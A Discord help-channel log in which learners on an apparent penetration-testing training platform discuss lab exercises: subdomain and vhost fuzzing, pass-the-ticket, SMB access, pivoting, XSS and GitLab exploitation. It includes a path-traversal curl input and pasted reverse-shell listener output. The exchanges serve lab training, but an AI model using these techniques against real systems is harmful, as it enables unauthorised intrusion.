#modules

1 messages · Page 281 of 1

faint rampart
#

It does?
I thought only the specific Azure ingestor and C# ingestor in the download section were the supported ones?

next bronze
#

new collectors don't worth with old bh gui, but old collectors will work with CE

limber river
next bronze
#

yeah that works with CE, just throw it in

thorn hawk
#

hey guys. does anyone knows I why I am having this behaviour with curl but when checking in the source there is clearly more html to be shown. is this something you have encountered?

muted kindle
thorn hawk
#

i see. thank you box for using google for me :P. But in the module we are using curl to filter out these parts. maybe i need to think another way to do that. thank you loads @muted kindle

sacred gull
#

Yeah idk about the CE edition, I much prefer the old GUI

patent flower
#

hi everyone
I have two problems
1 - the pentester/information-gathering/archivesweb/ room. For the question "How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234." when I use Wayback machine on that date, I come across the page of a domain name seller.

2- the same room for the skill assessement "What is the API key in the hidden admin directory that you have discovered on the target system?"
I can't use any tool on the inlanefreight.htb

thanks to you

scarlet badge
#

There is a file named revilkaseya.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the REvil ransomware Kaseya supply chain attack. Enter the total number of bytes that the victim has transmitted to the IP address 178.23.155.240 as your answer.

i put 3469 as answer but it says that's incorrect answer,

can someone give me a hint ?

fathom niche
#

Hi, I'm looking for more context of <b>Introduction to Digital Forensics --> Skills Assessment</b>
"Using VAD analysis" means "Windows.System.VAD" and which suspicious process meaning

silk anchor
#

Would I be right in saying that krbtgt doesn't always have a SPN assigned otherwise it would be an easy kerberoast and golden ticket attack?
The wording of a paragraph is throwing me off slightly as it says "there is one account with a SPN in the target domain" but the command output shows both krbtgt and mssqlsvc.

junior flicker
#

Hey Everyone, working through the Information Gathering-Web Edition module and am trying to complete the Creepy Crawlies section. I installed scrapy on the pwnbox and downloaded ReconSpider.py, but when I go to execute ReconSpider.py I get a ModuleNotFoundError: No module named 'scrapy.downloadermiddlewares.offsite'. How do I move forward since the error is in the ReconSpider.py?

junior flicker
#

Right, I just found a PyPi for ReconSpider, am I suppose to use that?

fathom pendant
#

No

#

That pypi is likely a different ReconSpider tool that uses a bunch of API keys

junior flicker
#

Gotcha, so then I guess I should be using what they posted in the module?

fathom pendant
#

Correct

#

The erratum I linked to has the fix

junior flicker
fathom pendant
#

And the tool author fixed it but ig it hasn't hit the backend

#

There's a reason it points to the academy backend for download instead of a pip install

grand solar
#

Quick question about the Pass the Ticket from Windows lesson in the Password Attack module if anyone know, is there a reason we can PowerShell into the Domain Controller with only having john's Kerberos ticket? is it because John has permission or admin access to remote in to it?

fathom pendant
#

Yes

junior flicker
clever sequoia
#

I have some question related to htb subscription where can I ask

fathom pendant
#

Support

compact patrolBOT
clever sequoia
#

thanks

zenith canopy
#

--path-as-is https://<IP>/../../../../../../whoops
what does these escape sequences mean?

fathom pendant
#

When you cd ../ you go back a directory

#

So chaining them you can go back to root

wraith pelican
zenith canopy
fathom pendant
#

Could you use less? Probably. But doing more than what's necessary ensures you're in the filesystem root

#

Say you're in your home dir, you can use cd ../../ to get to root fs, but you can use more and still get there

zenith canopy
fathom pendant
#

Correct

#

When on doubt, throw more on

zenith canopy
fathom pendant
zenith canopy
fathom pendant
#

it depends

#

It could be reading the file

#

Executing it

real tapir
#

in this section: https://academy.hackthebox.com/module/19/section/102
it says Since UDP is a stateless protocol and does not require a three-way handshake like TCP. We do not receive any acknowledgment. This seems like a typo, where there should be a comma in the middle. Is it correct as is?

rustic sage
#

Hey how do I chat in general?

real tapir
#

no clue

rustic sage
#

I need help

unique phoenix
#

How i chat in general

unique phoenix
fathom pendant
real tapir
real tapir
#

I see

unique phoenix
#

Guys can someone raid or hacka server

fathom pendant
scarlet badge
unique phoenix
#

I though this was the server to raid people bro

fathom pendant
unique phoenix
#

I mean raid servers

fathom pendant
#

<@&861185840277487616>

fathom pendant
#

If you read #welcome it tells you what the server is about

fathom pendant
# scarlet badge what?

Look at your screenshot, it tells you how many bytes were captured and how many are displayed

surreal rain
#

👁️‍🗨️

scarlet badge
#

displayed*

fathom pendant
scarlet badge
#

i tried to sum all displayed packets' length and still incorrect answer

fathom pendant
#

I'd say re-read the section as you likely glossed over something that would make this easy for you

sharp pike
#

can someone try to RDP into a machine on Password Attacks>Pass the Ticket (PtT) from Windows? or point me in the right direction to resolve these errors?

next bronze
rustic sage
#

i need help in the new skills check for the INFORMATION GATHERING - WEB EDITION skills assesment for the question "What is the API key in the hidden admin directory that you have discovered on the target system?". but i dont think i have discorvered a hiddin admin directory. am i missing something, someone pls help.

acoustic owl
rustic sage
#

okay, thx

junior flicker
#

I'm working through the Fingerprinting section of the Information Gathering-Web Edition. I've run out of ideas for determining the CMS system of app.inlanefreight.local. I went through curl initially, but I don't see any options that will pull more information, so I shifted to using nikto. For some reason nikto isn't connecting to app.inlanefreight.local and I get an error saying "open stream: getaddrinfo problems (Name or service not known)". The command I used is nikto -vhost http://app.inlanefreight.local -host <IP> -Tuning b -Display DV. Any ideas what I'm missing?

fathom pendant
junior flicker
fathom pendant
#

ip app.inlanefreight.local dev.inlanefreight.local in your /etc/hosts

fathom pendant
junior flicker
#

I can try that

fathom pendant
#

it's not hosted publicly; it's on the 10.129.x.x HTB network

#

meaning external routers/DNS can't reach it

#

also .local isn't a publicly routed TLD as far as I know

reef pecan
fathom pendant
#

i didn't use nikto for this tbh i used whatweb

junior flicker
#

Right, but I'm using tge pwnbox?

fathom pendant
#

you still need to tell your pwnbox where it's redirecting to

junior flicker
junior flicker
reef pecan
junior flicker
fathom pendant
fathom pendant
#

well it's because you're telling curl that the vhost you're using is app.inlanefreight.local querying that ip

#

but if you tried to visit it (without adding to your hosts file) in your browser, it won't load

junior flicker
strange forge
#

Further Credential Theft in windows privsec, does it require any vhost setup in /etc/hosts file. as it contains inlanefreight.local

fathom pendant
#

idk how nikto works tbh

junior flicker
fathom pendant
#

generally when you're given vhosts, you should add them to your /etc/hosts

#

as the guide itself is assuming this position that you've added it to your /etc/hosts

junior flicker
#

Noted😬

strange forge
fathom pendant
strange forge
#

ahhh

#

ehh

shell solar
#

hi, mb somebody had this problem or know how fix that? *deleted
i also try to do sudo useradd -M -s /sbin/nologin 10.129.95.230$
sudo smbpasswd -a -m 10.129.95.230, but its not working

fathom pendant
#

like all those commands you just referenced is hard overcomplicating this shit

#

also you don't need sudo to use smbclient

#

it helps if you tell us the module and section you're doing

#

it looks like there's some weird conflict with the smb server you have running

#

and not the target

shell solar
#

I did the same on the pwn box but got the same errors

fathom pendant
#

maybe john doesn't have SMB access

#

all the users for this section are unique

#

also those screenshots contain spoilers for john's login, i suggest deleting

#

it doesn't show he has read access to that share bud

#

again ALL USERS for this section are unique

#

you will not reuse any users for other questions of this section

#

WinRM user is different from ssh user is different from SMB user

shell solar
#

ok, thx

fathom pendant
#

look at the share name for your hint as to what user you might want to sniff for

young wyvern
fathom pendant
rustic sage
#

Hi, I'm doing the INFORMATION GATHERING - WEB EDITION model and I'm in the Virtual Hosts section and I'm stuck, I'm doing the following command
gobuster vhost -u http://94.237.59.199:34810/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain and it doesn't work I don't know what to do I need to replace the List words? or add use another flag

young wyvern
rustic sage
#

ha

fathom pendant
#

--append-domain would append the domain from the http://ip:port

#

--domain is a way around it

#

--domain inlanefreight.htb

rustic sage
#

ty

fathom pendant
young wyvern
#

It’s a beginner one

fathom pendant
#

Brother just say the module name

#

Not the path name

young wyvern
fathom pendant
#

Oh it's the getting started module

young wyvern
#

And in the “in-progress modules” tab it doesn’t show up there

#

Ah that’s it? Thought that was different my b

fathom pendant
#

Click the "enroll button" next to the cracking into htb skill path

young wyvern
#

It is indeed in my in progress tab

fathom pendant
#

And it'll populate the list in your dashboard

#

I don't recall needing to use gobuster dns for this module

young wyvern
fathom pendant
#

What section?

young wyvern
#

8 web enumeration

fathom pendant
young wyvern
#

I bet

fathom pendant
#

Use dir first

young wyvern
#

Lmao

fathom pendant
#

With the common.txt

young wyvern
#

Yeah I was having trouble finding the path for common.txt

#

But I just found it

#

Not the same as in the example

fathom pendant
#

Yeah example is using the old pwnbox version

young wyvern
#

Ahhhh makes sense

fathom pendant
#

find / -name "common.txt" 2> /dev/null

timber hatch
#

tried the obvious

fathom pendant
#

I also suggest using your own vm

#

Makes everything a lot smoother and more controlled

timber hatch
#

nvm

young wyvern
young wyvern
fathom pendant
#

Lol yeah

young wyvern
# fathom pendant Lol yeah

I lied I assumed now that I need to go in order but any of the domains I use can’t be found must be looking in the wrong place

fathom pendant
#

You don't need a domain

rustic sage
#

👀

fathom pendant
#

It's why I said to use dir and not dns

#

Dns isn't required at all for this exercise

reef stratus
#

Well I cannot recover my email

fathom pendant
#

Skill issue

young wyvern
fathom pendant
#

But not something anyone here can help with

fathom pendant
reef stratus
#

It's not actually I forgot change my old number to new number
I set my email as recovery

This how I became dumb

fathom pendant
reef stratus
#

I am getting crying and crying over if no one help about those password.
I am just child with fragile mind in adult

fathom pendant
#

Reach out to the support team that you're locked out of

reef stratus
#

Worst thing is I cannot remember the password

fathom pendant
wanton idol
#

we are not staff

fathom pendant
#

Actual Email issue

nova snow
#

can anyone advise on the skills assessment for broken authentication? I'm having some trouble with the 2fa

reef stratus
#

I reached to the staffs

fathom pendant
reef stratus
#

Sounds like dangerous people with password cranking

rustic sage
fathom pendant
#

Nothing can be done for you on the discord brother

rustic sage
#

Don't ask for help on discord. Rule no.456

wanton idol
#

especially if you just yapping away in here T-T

fathom pendant
rustic sage
reef stratus
#

They like " they cannot do reset at their end"

fathom pendant
wanton idol
#

oh well just make a new account 🤷‍♂️

fathom pendant
#

Your HTB account? Your actual email?

reef stratus
wanton idol
#

imagine its the actual email acc

fathom pendant
wanton idol
#

my guess he doesnt have access to the email he put on htb so he cant reset it

fathom pendant
reef stratus
zealous summit
#

How do I solve this lab, who can help ?

fathom pendant
#

Yeah so stop bitching in discord

wanton idol
#

bro how would htb solve that LMAO

fathom pendant
#

Reach out to your email provider for support

wanton idol
#

go reach out to google or make a new account LMAO

fathom pendant
#

From there, there are prerun scans for you to analyze

#

Everything you need to know is in the previous sections

fathom pendant
#

Analyzing the scans

#

It sounds like you didn't do shit or read anything

wanton idol
#

if u confused i suggest re-reading the section LMAO

#

its pretty simple and straight forward

fathom pendant
zealous summit
reef stratus
fathom pendant
wanton idol
#

oh i see and ^

wanton idol
fathom pendant
#

To sum it up @reef stratus no one here can help you

reef stratus
#

My last option was search password cranking

fathom pendant
#

I strongly recommend stop asking

fathom pendant
#

You don't own your email account, the provider does

wanton idol
#

a simple solution is make a new account 👍

zealous summit
dusky gyro
reef stratus
#

Bro I am actually crying and going through panicked

fathom pendant
#

We simply do not care

reef stratus
#

Fine...

viral lotus
#

also if something doesn't make sense google and youtube are your friends, nessus is one of the most known tools literally type it into youtube youll understand most of what you need

wanton idol
#

saying that in a discord is wild kek

fathom pendant
fathom pendant
wanton idol
#

💀

zealous summit
reef stratus
#

Bruh

fathom pendant
#

Password cracking is attacking

fathom pendant
#

There's the working with nessus scan output section that also may be helpful

wanton idol
fathom pendant
#

But we can't help you if you're too lazy to read the info

wanton idol
#

^^

fathom pendant
#

Of you're doing any of the cert paths it's highly encouraged to take notes

kindred dawn
#

Need help in the Password attack path PTH (pass the hash) section, the question about \DC01\David\david.txt

fathom pendant
#

Just do the thing

#

Make sure you're adding /run:cmd.exe to launch the new cmd prompt with the user

kindred dawn
#

with miminatz, from local Admin on MS01

#

specifying domain also. Maybe my machine is dead ill try resetting

fathom pendant
nova snow
#

Can anyone provide advice on the skills assessment for broken authentication? I'm encountering issues with the 2FA implementation. Any tips or guidance would be greatly appreciated.

fathom pendant
#

Iirc you don't need to bruteforce it

nova snow
#

Hmm, I'm not sure what else to d

acoustic owl
#

look again in the module. It shows you various techniques

viral lotus
#

in the Windows Event Logs & Finding Evil module it seems evil to put the mimikatz question last its so much easier than the other 2, I felt like faceplanting my keyboard before that one haha

kindred dawn
obtuse haven
#

im a bit confused in the Web Recon - Skill Assessment section

#

the website does not seem to have much to play with

#

i had done this before the update and the questions were different

kindred dawn
#

weird 0_0

dusky gyro
fathom pendant
fathom pendant
#

Also: don't forget to add any found subdomains to /etc/hosts

obtuse haven
fathom pendant
#

If you can't find something: start digging

obtuse haven
fathom pendant
#

Subdomains-top1million-110000.txt is usable for both

obtuse haven
#

maybe i only tried the 20000 before though

fathom pendant
#

Yeah I double triple checked and the subdomain is only on that and the combined list (which is about 60x larger)

obtuse haven
#

great i thought of trying but honestly i was skeptical of enumerating subdomains because of how the question was phrased

fathom pendant
#

It's the wordlist showcased throughout the module btw

shell solar
fathom pendant
#

Take out the -P argument and see if putting in the password that way works

shell solar
#

do_connect: connection failed NT_STATUS_NOT_FOUND

fathom pendant
#

Well that's a different error at least

next bronze
#

try using the impacket smbclient maybe

fathom pendant
#

Wait

fathom pendant
#

It's either \\\\ip\\share or //ip/share

shell solar
#

yes it already works

#

thx

fathom pendant
#

The reason for \\\\ is that bash will interpret it as \\

#

Because \ is the escape character

obtuse haven
#

thank you

fathom pendant
#

Np

#

ReconSpider (HTB) is goated btw

obtuse haven
# fathom pendant ReconSpider (HTB) is goated btw

yeah it is actually pretty useful. maybe i could have struggled a little with the double subdomain because it is something i havent found before doing HTB machines and i dont usually test it, but i guess at some point i would have tried it

#

i guess next time im stuck it will come to my mind way quicker

fathom pendant
upbeat oak
#

Doing the live engagement of the shells and payload and trying to get a hostname of host 1, trying to enumerate using nmap but even a -A isn't giving me anything I'm pretty sure there should be an rdp port considering the question, should I just scan directly for rdp?

fathom pendant
#

(Or use host 1 as a jump host)

upbeat oak
fathom pendant
#

Btw jump-host I'm referring to the 10.129.x.x target spawned

#

Hosts 1-3 are internal to the jump host

#

On the 172.16.x.x network

upbeat oak
fathom pendant
#

Ok so let's break this down

#

You can only access the jump-host [10.129.x.x] from your machine
The hosts are on the 172.16.x.x subnet [which the 10.129.x.x host has access to]

upbeat oak
#

tracking

fathom pendant
#

You need to either pivot through the jump-host, or use tools on the jump-host to scan and exploit the hosts

#

The jump-host is a parrot attack-box

upbeat oak
#

Hmmm I'm a little lost there, I understand what you mean however I need to think on the method

next bronze
#

I belive a network digram is provided in the section

fathom pendant
#

^

#

You need to use the jump-host [10.129.x.x] to scan the hosts 1-3

upbeat oak
#

Okay I think I'm tracking now

fathom pendant
upbeat oak
#

thanks for the help btw

next bronze
#

yeah surprisingly browsers can do a lot of things

#

my firefox even works as a file explorer

fathom pendant
next bronze
#

yep

glad citrus
#

Anyone have a guide to installing crackmapexec on the HTB parrot machine?

fathom pendant
#

Crackmapexec is archived and no longer being maintained

sacred gull
#

cme is obsolete with nxc now

fathom pendant
#

Netexec is the same tool (literally)

#

Tl;Dr the main people updating and actually maintaining cme did not like the direction the repo owner for cme was going, so they forked it

sacred gull
glad citrus
#

Thanks everyone. Finally make some headway on the password attack module 😓

viral lotus
#

oh wicked to know that about cme I'll bookmark that for when I need it, thanks.

fathom pendant
muted jacinth
#

has anyone completed the windows evasion technique module?

#

and sorry Hi (losing my decency or what)

fathom pendant
muted jacinth
#

okay,
Introduction to Windows Evasion Techniques

Page 3
Static Analysis

Static Analysis

got this but no flag appear. wonder if it's normal

fathom pendant
#

well if no flag appears, then you're likely doing something wrong

#

it's getting deleted because it's large block of text and your account isn't linked ( #welcome )

muted jacinth
#

ok

#

ok so the cat.log text display it's 'OK' but apparently is not

#

can't paste it cause too big app

next bronze
#

your project configurations need to be excatly the same as the module's

strange forge
#

Further Credential Theft in windows provesc, i got the winscp creds. but it is not getting connected. it says tr******.inlanefreight.local does not exist

sharp pike
#

Password Attacks>Pass the Ticket (PtT) from Linux: having issues understanding what "export KRB5CCNAME" is supposed to be. I have set it to "julio" & tried to get the file as instructed but smb wont connect

muted jacinth
#

oaky... that seems corny a bit but okay

round epoch
#

Hi, I'm completing Information Security Foundations and have hit a problem with the Windows 10 VM: it does not exist. I downloaded 23+Gigabytes of what I thought was the Windows 10 Developer Evaluaton VMware machine, but it does not install, as there is nothing to install after extraction. What have I missed?

next bronze
muted jacinth
#

anyway it feels kinda weird cause when the module start they're disclosing not to do the module anywhere else than their vm but like first real question is litt something you can't do on the provided vm cause it's the target one and not the dev one so you have to do the compiling stuff on your own vm, feels odd

next bronze
sharp pike
next bronze
round epoch
#

@next bronze I am following explicit instructions on what and how to install Windows 10. I have an installation of VMware; I have installed ParrotOS on the VM. The task now is to install Windows 10, but the description of the download is that it is a pre-configured VMware machine. This is where I am having a problem. There is no installation media for Windows 10 VMware, or at least, I have been unable to find it among the 23 GB of data I downloaded.

sharp pike
next bronze
round epoch
#

@next bronze Okay; I'll give both a try. Thank you.

upbeat oak
#

If they update a module do you have to redo it again to complete the cpts pathway? One of the modules I completed says I have more to do now?

round epoch
hushed sail
upbeat oak
fathom pendant
hushed sail
upbeat oak
fathom pendant
#

so if you really wanna know, bug them

hushed sail
fathom pendant
#

my knowledge comes from the last time something like this happened (The addition of the thick clients to common apps

rustic sage
fathom pendant
junior flicker
rustic sage
rustic sage
fathom pendant
#

i've had wappalyzer be hit or miss with this question tbh

#

some people get it, some don't

fathom pendant
#

whatweb doesn't fail me 🙏

fathom pendant
rustic sage
#

nonono, i used whatweb

rustic sage
fathom pendant
#

I think way back when i did this (yes it's a repeated target from the previous iteration) I just looked for the most common word in the source code

#

if you also view the page it also says it multiple times

#

sometimes you can make leaps of logical deduction

#

"man this is repeated a bunch of times..."

rustic sage
#

yes

fathom pendant
#

it's just knowing when you can safely make the logical deduction, and when to continue digging

rustic sage
fathom pendant
rustic sage
#

ah, havent checked that... big brain

#

will do

fathom pendant
#

but good deduction that i was referring to the robots.txt

flat parrot
#

Hey its funny but I can't close this chat

fathom pendant
#

just click the green bubble to minimize the chat view

flat parrot
#

When I press, opens this another

#

But no problem, Ill disable it, thanks!

fathom pendant
#

ah

#

weird issue ¯_(ツ)_/¯

flat parrot
rustic sage
#

someone pls help:

#

Does anyone know why it’s not working for me, and if it’s not a problem on my part who should I contact so I can finish it.

#

not working (wanna find subdomains)

#

for the info gathering web iditions skills check

#

idk why its not working anymore

#

i tried restarting and reseting host

mint peak
#

I've had extensive issues with the info gathering web edition skills check as well. Couldn't seem to get it working. I finished it months ago before they updated it, have issues going back to it now.

I just decided to move on for now @rustic sage

trail sail
#

Hi everyone,
Can someone help me out? I'm in the AD Module | AD Enumeration & Attacks - Skills Assessment Part I. I'm about to get the last user and password, but the command just isn't working.

rustic sage
trail sail
mint peak
next bronze
rustic sage
#

how can i bypass

#

bc having much isues with this

rustic sage
trail sail
# rustic sage what do u mean?

Literally just navigate through all the sections of the module until you have no pending sections left to complete. This works only if you already completed the module before the update. This allows you to bypass=complete the module without doing all the labs again

mint peak
# rustic sage How can I do pleat the module if not working

If this is your first time going through the module, you are fine. I finished the module months ago before they updated it. My old answers to the old questers are still there, but there are new questions. It doesn't matter for you, just for people who did it before the update

trail sail
junior flicker
mint peak
muted kindle
next bronze
trail sail
trail sail
split glade
rustic sage
split glade
#

Yes that didn't help ^^

trail sail
#

Still timing out. 😦

rustic sage
#

Very confused

#

Ahhh

fathom pendant
#

I used ligolo-ng and not one of the other methods that involves proxychains so I wouldn't know

#

you need to have a listener within the network that allows you to forward the request through that socket

junior flicker
#

@rustic sage @fathom pendant I used whatweb and got it, I'm still curious to get nikto working, but I can wrestle with that later. Thank you both for your help!

rustic sage
split glade
# trail sail That was it lol

During this module you may want to try ligolo-ng too (like several people said)
For your problem, maybe you need to use socks4 127.0.0.1 9050 instead of socks5 127.0.0.1 1080, not sure what netexec supports

rustic sage
trail sail
fathom pendant
fathom pendant
rustic sage
fathom pendant
#

then yeah

#

use the subdomains-top1million list that's been referenced a lot in this module

#

it will be useful to add -r as well to the dnsenum command

fathom pendant
#

you can put multiple entries on the same line
ip entry1 entry2 entry3 ...

rustic sage
fathom pendant
#

After that just enumerate the found subdomains

rustic sage
#

not working dont think its problem with wordlist not resolving: inlanefreight.htb:37582 NS record query failed: NXDOMAIN

rustic sage
#

?

#

But that’s the last part it doesn’t run the wordlist not fuzzing at all I don’t think

#

Also not working with ffuf

#

It’s as if not recognizing what’s in hosts file

#

Like dns broken or smt

fathom pendant
#

nah

rustic sage
#

Hdsksjsjsjsjsjkwjf xxs

#

Rage

fathom pendant
#

i used ffuf for this

#

not dnsenum btw

#

dnsenum really only works if DNS is running btw

wanton idol
fathom pendant
#

gobuster also worked for me

rustic sage
#

Here’s what I will do, will submit vid of me trying to do it in help section so u and others see

fathom pendant
#

ffuf and gobuster worked for me

#

what's your ffuf command?

rustic sage
#

Almost

wanton idol
#

is he doing the footprint module?

fathom pendant
#

nah

#

the information gathering - web edition

#

skill assessment

wanton idol
#

ah gotcha

rustic sage
#

Doesn’t work even after u let it finish

fathom pendant
wanton idol
fathom pendant
#

ffuf -w <wordlist> -u http://host:ip -H "HOST: FUZZ.host" -ac

#

it's taught how to do this in the module

#

at least with gobuster

rustic sage
#

Ah fk ur completely right I totally forgot 💀

wanton idol
#

loll

rustic sage
#

Thc u so much

fathom pendant
#

gobuster vhost -u http://host:port -w <wordlist> --append-domain

#

you can also increase threads

#

just tested mine with 100 threads and should be safe

#

-ac autocalibrates and throws away the junk responses btw

#

shiiiiet 1000 threads works too

#

gobuster does not like 1000 threads

fathom pendant
#

you went smaller not larger btw

#

the previous list you used was 20000 current 5000

fathom pendant
#

@rustic sage I just spun up a target and ran the commands to enumerate and stuff and it all worked as intended

#

also to add on- with results.json from the ReconSpider tool; you can do cat results.json | jq -r '.[key]' (replacing [key] with the json key value, leaving the leading .)

#

the key values are in the creepy crawlies section if you wanna look it up

rustic sage
fathom pendant
rustic sage
jaunty mortar
#

Can I get a hint on Enumerating API section of Advanced XSS and CSRF Exploitation module.
I'm getting error: "NetworkError: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'http://api.vulnerablesite.htb/v1/sessions'."
I've tried payload without credentials,
I have tried fetching authentication bearer from localStorage but my payload returns null
I have tried payload that makes use of iframe but no luck as well

fathom pendant
idle egret
#

Hi Guys, I just started the CPTS path and in the Getting Started module, specifically the Privelege Escalation section, I'm trying to transfer the "id_rsa" file to the pwnbox. It seems i'm missing something basic here.

What I've tried: I tried copying the file to the user2 folder, which wroked. From there, I tried copying to the pwnbox which didn't work.

Any help will be appreciated. Thanks

jaunty mortar
fathom pendant
#

cat the file, select it all, ctrl+shift+v --> open a text editor, ctrl+shift+v in the text editor, save

jaunty mortar
fathom pendant
#

either that or your payload has to indirectly reference the API

#

somehow

idle egret
fathom pendant
fathom pendant
#

the only time public servers are involved are when they have you attack inlanefreight.com (these happen on occasion, it is a site owned by HTB for use in pentesting practice, it's registered so you can always access it)

#

if you hadn't noticed the fictional company inlanefreight LTD keeps popping up in these environments 😉

idle egret
fathom pendant
#

yup; and I can understand initial hesitation to go after a .com site, but it is 100% allowed :)

#

idk if they changed a lot of it for the info gathering module, but they had you previously do basic recon/tools like whois; dig queries; etc to get basic info about sites that have a public bounty program and the scope is there

idle egret
#

But I'll keep that in mind

fathom pendant
#

and the skills assessment wants you to use practically all the skills and tools from it

#

i'd say it should take ~ 30 minutes with no hiccups, ~60 minutes if you get hung up on something/start overthinking

jaunty mortar
# fathom pendant try and see?

that didn't work, I think the trick is in bypassing CORS restriction but I have exhausted all tricks I know to bypass e.g. change GET => POST, use <iframe>, remove withCredentials

fathom pendant
#

i haven;t done this module truthfully but i wish you luck in getting an answer ¯_(ツ)_/¯

ruby ginkgo
#

Hi
Module: Attacking Common Applications
Section: Attacking GitLab
Question: gain remote code execution on the GitLab instance? Submit the flag in the directory you land in.
Here, I found the user named Dxxx, could you give me a hint how to find his password? I tired hydra with rockyou.txt but all passwords are false positive.

wanton idol
#

if u havent already

ruby ginkgo
#

i didnt find anything. i do check that

wanton idol
#

maybe check the version of the gitlab and see if it has any exploits

ruby ginkgo
#

im getting this error tho : listening on [any] 8443 ...
connect to [10.10.14.114] from (UNKNOWN) [10.129.162.93] 54164
bash: cannot set terminal process group (1281): Inappropriate ioctl for device
bash: no job control in this shell
git@app04:~/gitlab-workhorse$ exit

#

while getting the rce.

wanton idol
#

well it is a authenticated exploited and since u havent found the correct password for the user which could explain why it fails

fathom pendant
#

after you get the user@host...

wanton idol
#

or that too

fathom pendant
#

that error is a standard error for a lot of service accounts with bash

wanton idol
#

ah got it

fathom pendant
#

it just means it doesn't have a profile set ¯_(ツ)_/¯

#

as most app/services won't have a profile/bashrc

wanton idol
#

true true

fathom pendant
#

i definitely feel like he just saw the bash errors and typed exit after it loaded...

ruby ginkgo
#

no i didnt

fathom pendant
#

well something added the exit command at the end

wanton idol
#

try again and see 🤷‍♂️

fathom pendant
#

at least from the tidbit you showed

ruby ginkgo
#

the acc Successfully Authenticated
but its exit automatically

wanton idol
#

is the ^C part of it?

ruby ginkgo
#

nah

wanton idol
#

just to make sure lol u did copy the command shown on the section since its the same exploit

ruby ginkgo
#

but even after removing ^C i get the same errro tho

#

yeah i did correclty

wanton idol
#

and it just exits once u connect?

fathom pendant
#

that's weird

sleek moss
#

is cryptography in oscp?

fathom pendant
#

cryptography is kinda broad

sleek moss
#

like rsa key and stuff

fathom pendant
#

it can be used to mean password hashing

fathom pendant
sleek moss
#

like decryption like in the brainfuck

fathom pendant
#

no

ruby ginkgo
sleek moss
#

there was an ecrypted sentence

fathom pendant
#

you won't need to do any advanced decryption

#

just your standard hex/b64

sleek moss
#

like decryption for this in brainfuck Mya qutf de buj otv rms dy srd vkdof 🙂

Pieagnm - Jkoijeg nbw zwx mle grwsnn

A admin
Apr '17

Xua zxcbje iai c leer nzgpg ii uy...

O orestis
Apr '17

Ufgoqcbje....

Wejmvse - Fbtkqal zqb rso rnl cwihsf

A admin
Apr '17

Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg 🙂

mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sja

O orestis
Apr '17

Si rbazmvm, Q'yq vtefc gfrkr nn 😉

Qbqquzs - Pnhekxs dpi fca fhf zdmgzt

#

like what would yo ucall this kind of decryption?

#

so i acn learn

mint peak
#

The Active Directory Enumeration & Attacks module has sooo much information. Been working through it and taking notes for three days now 😅

fathom pendant
#

reminder: OSCP is an entry cert also this question belongs more in #careers-and-certs not here in the modules channel @sleek moss

olive chasm
#

Hello
Module Introduction to Python 3
Im upto Managing Libraries in Python and trying to install flask with pip but when I try it says error: externally-managed-environment and wont let me progress, What am i doing wrong?

fathom pendant
#

python 3.11+ introduced the "EXTERNALLY-MANAGED" File

#

you can also remove that file as all it is is a simple flag file

wraith pelican
spark spruce
#

my monthly subscription has expired but still I can use unlimited pwnbox
why?
is there any reason?

fathom pendant
#

yes, that's the legit reason

#

if you spend any amount of money/have had a subscription you still retain the unlimited pwnbox

spark spruce
#

Will I get this benefit for lifetime? @fathom pendant

fathom pendant
#

yes

timber hatch
#

ReconSpider is causing many error when try to install, anybdoy also hhave/had this problem?

fathom pendant
#

you may need to add --break-system-packages if you hadn't deleted the "EXTERNALLY-MANAGED" File in your python install

timber hatch
#

thanks!

thorn hawk
#

good morning/afterrnoon to all. I have some issue with the Web Attack module i can not recreate what is asked during the explanation of the module. It requires us to use this curl command to grep some parts of the html but this is not perform on the live target when i try. curl -s "http://SERVER_IP:PORT/documents.php?uid=3" | grep -oP "/documents.*?.pdf" The HTML code that needs to be grep it does not come up even if it is in the source code when i look manually.

fathom pendant
#

well did you swap out the target:port to the target IP and port?

#

i,e, 94.234.87.99:36578

nova snow
#

anyone DM for advise on the skills assessment for broken authentication? I'm having some trouble with the 2fa i tried all, brute force, Bypasses, session attack ...

humble ravine
#

Hello everyone, I'm having troubles with "INTRODUCTION TO ACTIVE DIRECTORY" module, I'm supposed to connect to a pwnbox and connect via rdp to a windows machine, I can connect and I accepted the certificate but It cannot load the remote machine, just blackscreen untill I get disconnected.

Am I doing something wrong or is pwnbox overloaded right now?

fathom pendant
humble ravine
#

I managed to load after 7th attempt, thanks

#

is there any way to resize xfreerdp window?

#

I jst cannot see windows start

fathom pendant
#

you need to first crack it open before being able to parse it

#

it's explained, you just didn't read

fathom pendant
#

throw hashcat at it and you'll be surprised

#

they also show how to grab it via nxc/cme

#

to extract

#

generally HTB will show the simpler way

#

but if you wanna go through the effort of doing it this way; be my guest

#

it took 5 seconds to google and find an answer

#

short answer; yes it's likely intentional

#

considering they give you the cme command that makes it easier

mint peak
#

I know it's scheduled maintenance but it still makes me sad. I was in mid command execution and the VM is down now pepehands

fathom pendant
#

usually it's at the bulletin at the top

#

the pwnbox do have lifetimes

mint peak
fathom pendant
#

min 2 hours from you turning it on

#

this is why I use my own vm ¯_(ツ)_/¯

#

don't gotta worry about maintenance unless I fuck up ™️

mint peak
#

Nah the target machine pooped the bed

#

Had to switch to the dirty dirty EU

fathom pendant
#

then don't describe it as a vm, describe it as the target

split glade
fathom pendant
#

vm implies it's the machine you're using

fathom pendant
mint peak
#

DonT dEscRibE it As a vM 🤓

#

Sir this is wendys

fathom pendant
#

I and many others will read it as "The VM i am using/pwnbox"

#

not the target machine

mint peak
#

The target machine is in fact a VM

fathom pendant
#

it is, but that doesn't mean people don't have preconceived ideas of what VM means in relation to academy

#

"VM is down oh no" --> many people assume you mean the pwnbox

#

Target is down --> ah, skill issue

#

it's not about being "technically correct" it's about what words people use to describe the environments

mint peak
#

😐

#

Go off king

fathom pendant
#

also some of the targets are docker containers

#

just trying to help you for future, that way people don't get confused when trying to help you

lofty sparrow
#

can someone give me a little nudge for Skills Assessment - File Upload Attacks

rustic sage
mint peak
silk minnow
#

HTTP ATTACKS - TE.CL

Getting a request timeout from the target even though I used the payload shown in the solutions. Anybody able to help with this?

rustic sage
#

Check your network connection

safe yoke
#

can anyone help me out with this part really confused here

